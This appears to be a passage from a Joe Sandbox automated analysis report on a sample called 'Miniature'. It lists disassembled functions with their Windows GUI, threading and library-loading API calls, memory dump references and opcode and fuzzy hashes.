                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 769258816b5673da684fceb369fe1b19af217d2dd04b3ca6ea679a5d5d58b438
                                                                                                                                                                                                                                                                                            • Instruction ID: 00ca555c24e1f98da7600d3303a641a3c7fc8ddf798a375287b65aba22047e86
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 769258816b5673da684fceb369fe1b19af217d2dd04b3ca6ea679a5d5d58b438
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D113A75A0105AABCB10DFA4C985AEE7BB8EF06345F100452FA12E7140C774BA91EBA5
                                                                                                                                                                                                                                                                                            Function 00C7EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C7EB14
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C7EB47
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C7EB5D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C7EB64
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9202d344fbd00a208ef179e62830a1de2380e84487a3a96dcf09863fbc6e2b05
                                                                                                                                                                                                                                                                                            • Instruction ID: 69dfcc2873e3259102089c501dd69996be921f04529c60f1972e5a13ecdea783
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9202d344fbd00a208ef179e62830a1de2380e84487a3a96dcf09863fbc6e2b05
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711DB76900258BBCB019FA89C45BDF7FADEB4A324F148256F927D72A0D67489048B61
                                                                                                                                                                                                                                                                                            Function 00C3D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,00C3D369,00000000,00000004,00000000), ref: 00C3D588
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C3D594
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C3D59B
                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00C3D5B9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9ac385b351646522b786b727a5a641f05c313c21534b9d1666f91c8b0e8fa01e
                                                                                                                                                                                                                                                                                            • Instruction ID: a95b76c0d77ae2d1dda6750b50b3185b12599d62ed34bb3799dd6eacf94d3cd9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac385b351646522b786b727a5a641f05c313c21534b9d1666f91c8b0e8fa01e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B01F9B24252147BCB116FA5FC05BAE7B69EF81335F100219F927871E0DB708901D7A1
                                                                                                                                                                                                                                                                                            Function 00C17873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C178B1
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C178C5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C178CF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4244dc4eb75e590872c54ca0277f5568ace991f678978f968192211b3570816b
                                                                                                                                                                                                                                                                                            • Instruction ID: f5de5ebc30fbb754aafb0ef3fb0d9d103e2e793a2e947f32f3dc497cc68e0ef6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4244dc4eb75e590872c54ca0277f5568ace991f678978f968192211b3570816b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF11A172505548BFEF065F90CC58FEA7B69FF0A368F040215FA12A6160DB319CA0FBA0
                                                                                                                                                                                                                                                                                            Function 00C433E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00C4338D,00000364,00000000,00000000,00000000,?,00C435FE,00000006,FlsSetValue), ref: 00C43418
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C4338D,00000364,00000000,00000000,00000000,?,00C435FE,00000006,FlsSetValue,00CB3260,FlsSetValue,00000000,00000364,?,00C431B9), ref: 00C43424
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C4338D,00000364,00000000,00000000,00000000,?,00C435FE,00000006,FlsSetValue,00CB3260,FlsSetValue,00000000), ref: 00C43432
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 936b75a13d1c1ef3d9fe9b16f78e7c74c1b99022f8cc34d4d57040d08e238d10
                                                                                                                                                                                                                                                                                            • Instruction ID: 7993513d3d8bc36e0c3e3dc2279963690771db861ec5e7ade96fe662549ba8e8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 936b75a13d1c1ef3d9fe9b16f78e7c74c1b99022f8cc34d4d57040d08e238d10
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4201A732711262ABCB224B799C44BDA7FA8BF95B757211620FA17D7580D720DF01C6E0
                                                                                                                                                                                                                                                                                            Function 00C7BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BA8B
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BAB0
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BABA
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7B69A,?,00008000), ref: 00C7BAED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b5026b6881c8737fabd4c4c54cb3ab39546a2a49c2724aeea26ce2948ea99674
                                                                                                                                                                                                                                                                                            • Instruction ID: 312f8bca497adf1c874399532465ab3fb9b79ca7708a673e0cccd0fa3f1be3b3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5026b6881c8737fabd4c4c54cb3ab39546a2a49c2724aeea26ce2948ea99674
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B113931C00629EBCF00AFA5E9497EEBB78BF09721F108095E946B2550CB309A519BA5
                                                                                                                                                                                                                                                                                            Function 00CA886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00CA888E
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00CA88A6
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00CA88CA
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CA88E5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a0ebc9f14ce9351465f1ccc09bcb53c13edc52fc8a51c9c55d6740ac4805688d
                                                                                                                                                                                                                                                                                            • Instruction ID: c10b91e8f130559e18ed4df7c46ef1ae7d8dbe81ffb811a9742e82153e9b94b4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0ebc9f14ce9351465f1ccc09bcb53c13edc52fc8a51c9c55d6740ac4805688d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 381140B9D0020AAFDB41CFA8C884AEEBBB5FF09314F508166E915E3650D735AA54CF50
                                                                                                                                                                                                                                                                                            Function 00C736F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C73712
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73723
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C7372A
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C73731
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6cbc509ca037cd343da8d11e795990448aa6fff091486f5b4b4a651df0f37364
                                                                                                                                                                                                                                                                                            • Instruction ID: c459fe5cef7d84bd86f97468a1a8aca008270ad494bc081130fa4c00b3c29c51
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cbc509ca037cd343da8d11e795990448aa6fff091486f5b4b4a651df0f37364
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE06DB1101264BADA241BA29C4DFEF7F6CDB43BA5F004015F20BD6480DAA08A80D2B1
                                                                                                                                                                                                                                                                                            Function 00CA92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C11F87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11F96
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: BeginPath.GDI32(?), ref: 00C11FAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11F2D: SelectObject.GDI32(?,00000000), ref: 00C11FD6
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CA92E3
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00CA92F0
                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00CA9300
                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00CA930E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1de3964e7f8be0866f9338717b40d525e211e183a9ab2d60af2b5b03251925b1
                                                                                                                                                                                                                                                                                            • Instruction ID: 15eb2c754573cfdcfc3154f4bd01e4316e12d9dd4d0aa9a0884aa46f623aa284
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1de3964e7f8be0866f9338717b40d525e211e183a9ab2d60af2b5b03251925b1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9F05E31006259BADB125F54AC0EFCE3F69AF0B328F048000FA13260E2C7759662ABA5
                                                                                                                                                                                                                                                                                            Function 00C121A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 00C121BC
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00C121C6
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00C121D9
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00C121E1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7b84c4a1e69f5afde727860f259253db4d4b95b4a7f8fefd5dc47c2cef7dc0aa
                                                                                                                                                                                                                                                                                            • Instruction ID: 113cb5132150351836454c2fcda0343cb1f6dcff18fec41cdc55d405b68fdb61
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b84c4a1e69f5afde727860f259253db4d4b95b4a7f8fefd5dc47c2cef7dc0aa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39E06535240280AADB215B74AC097EC7B21AB1333AF148219F7B7550E1C77146859B10
                                                                                                                                                                                                                                                                                            Function 00C6EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C6EC36
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C6EC40
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6EC60
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 00C6EC81
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 10d0628853ed2183c4c8d5d07fc63fa167ee0ddfecf75aa1fe178fd3e212f5c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 23c15c9c0cb51adfb4ebd3dd793acdd5bc9eee3f3d1f0e988cabb94252e8e7de
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10d0628853ed2183c4c8d5d07fc63fa167ee0ddfecf75aa1fe178fd3e212f5c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01E01AB4C00204EFCB40AFA0D948B9DBBB1EB49315F108809F84BE3650C7385942EF00
                                                                                                                                                                                                                                                                                            Function 00C6EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C6EC4A
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C6EC54
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C6EC60
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 00C6EC81
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
